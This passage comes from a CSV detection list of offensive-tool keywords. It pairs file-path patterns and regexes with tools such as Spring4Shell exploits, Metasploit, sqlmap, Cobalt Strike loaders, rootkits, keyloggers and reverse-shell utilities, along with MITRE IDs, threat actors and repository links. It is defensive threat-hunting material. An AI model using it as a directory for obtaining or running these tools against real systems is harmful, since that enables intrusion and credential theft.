tool","https://github.com/reznok/Spring4Shell-POC","1","1","N/A","N/A","N/A","4","311","236","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z","11562" "*/Spring4Shell-POC*",".{0,1000}\/Spring4Shell\-POC.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","1","N/A","N/A","N/A","4","366","108","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z","11563" "*/SpringCore0day*",".{0,1000}\/SpringCore0day.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","N/A","4","394","194","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z","11564" "*/spring-core-rce*",".{0,1000}\/spring\-core\-rce.{0,1000}","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","N/A","1","50","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z","11565" "*/Spring-CVE/*",".{0,1000}\/Spring\-CVE\/.{0,1000}","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","N/A","1","14","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z","11566" "*/SpringFramework_CVE-2022-22965_RCE*",".{0,1000}\/SpringFramework_CVE\-2022\-22965_RCE.{0,1000}","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation 
tool","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","#linux","N/A","N/A","1","75","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z","11567" "*/springshell-rce-poc*",".{0,1000}\/springshell\-rce\-poc.{0,1000}","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DDuarte/springshell-rce-poc","1","1","N/A","N/A","N/A","1","19","12","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z","11568" "*/Spyndicapped.exe*",".{0,1000}\/Spyndicapped\.exe.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","1","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","11569" "*/Spyndicapped.git*",".{0,1000}\/Spyndicapped\.git.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","1","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","11570" "*/sql_inj.txt*",".{0,1000}\/sql_inj\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","11571" "*/SQLC2.ps1*",".{0,1000}\/SQLC2\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","11572" "*/sqli.txt*",".{0,1000}\/sqli\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","11573" "*/sqli/mssqli*",".{0,1000}\/sqli\/mssqli.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11574" "*/sqli/mysqli*",".{0,1000}\/sqli\/mysqli.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11575" "*/sqli/postgresqli*",".{0,1000}\/sqli\/postgresqli.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11576" "*/sqli/sqlitei*",".{0,1000}\/sqli\/sqlitei.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11577" "*/sqli/utils*",".{0,1000}\/sqli\/utils.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11578" "*/sqli_test.rb*",".{0,1000}\/sqli_test\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11579" "*/Sqlmap*",".{0,1000}\/Sqlmap.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","11580" "*/sqlmap.zip*",".{0,1000}\/sqlmap\.zip.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/codewatchorg/sqlipy","1","1","N/A","network exploitation tool","N/A","3","254","92","2024-06-19T23:38:41Z","2014-09-22T03:25:42Z","11581" "*/SQLRecon*",".{0,1000}\/SQLRecon.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","11582" 
"*/sqrtZeroKnowledge/CVE-*",".{0,1000}\/sqrtZeroKnowledge\/CVE\-.{0,1000}","offensive_tool_keyword","poc","Exploit for the CVE-2023-23398","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","N/A","2","161","41","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z","11583" "*/src/common/c&c.h*",".{0,1000}\/src\/common\/c\&c\.h.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","11584" "*/src/exploit.html.tpl*",".{0,1000}\/src\/exploit\.html\.tpl.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","N/A","4","396","54","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z","11585" "*/src/gTunnel/configured*",".{0,1000}\/src\/gTunnel\/configured.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","11587" "*/src/gTunnel/gserver/*",".{0,1000}\/src\/gTunnel\/gserver\/.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","11588" "*/src/gTunnel/logs*",".{0,1000}\/src\/gTunnel\/logs.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#linux","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","11589" "*/src/john.com*",".{0,1000}\/src\/john\.com.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","11590" "*/src/jumbo.c*",".{0,1000}\/src\/jumbo\.c.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","11591" "*/src/jumbo.h*",".{0,1000}\/src\/jumbo\.h.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","11592" "*/src/KaynStrike.c*",".{0,1000}\/src\/KaynStrike\.c.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","11593" "*/src/nysm.c*",".{0,1000}\/src\/nysm\.c.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","11594" "*/src/pendulum.c*",".{0,1000}\/src\/pendulum\.c.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","#linux","N/A","9","1","95","11","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z","11595" "*/src/pendulum.h*",".{0,1000}\/src\/pendulum\.h.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","#linux","N/A","9","1","95","11","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z","11596" "*/src/RecycledGate.h*",".{0,1000}\/src\/RecycledGate\.h.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","11597" "*/src/Sleeper.cpp*",".{0,1000}\/src\/Sleeper\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","11598" "*/src/unixshell.rs*",".{0,1000}\/src\/unixshell\.rs.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","11599" "*/src/winsos.cpp*",".{0,1000}\/src\/winsos\.cpp.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","11600" 
"*/srdi-shellcode.go*",".{0,1000}\/srdi\-shellcode\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11601" "*/srv/kidlogger*",".{0,1000}\/srv\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","11602" "*/SSH R.A.T.exe*",".{0,1000}\/SSH\sR\.A\.T\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","11603" "*/ssh2-enum-algos.nse*",".{0,1000}\/ssh2\-enum\-algos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11604" "*/sshamble.git*",".{0,1000}\/sshamble\.git.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","11605" "*/sshame*",".{0,1000}\/sshame.{0,1000}","offensive_tool_keyword","sshame","tool to brute force SSH public-key authentication","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/HynekPetrak/sshame","1","0","#linux","N/A","N/A","1","75","16","2024-03-24T11:07:35Z","2019-08-25T16:50:56Z","11606" "*/ssh-auth-methods.nse*",".{0,1000}\/ssh\-auth\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11607" "*/ssh-brute.nse*",".{0,1000}\/ssh\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11608" "*/ssh-hostkey.nse*",".{0,1000}\/ssh\-hostkey\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11609" "*/sshimpanzee.git*",".{0,1000}\/sshimpanzee\.git.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","11610" "*/ssh-publickey-acceptance.nse*",".{0,1000}\/ssh\-publickey\-acceptance\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11612" "*/ssh-run.nse*",".{0,1000}\/ssh\-run\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11613" "*/SSH-Snake.git*",".{0,1000}\/SSH\-Snake\.git.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","11614" "*/SSH-Snake/*",".{0,1000}\/SSH\-Snake\/.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","11615" 
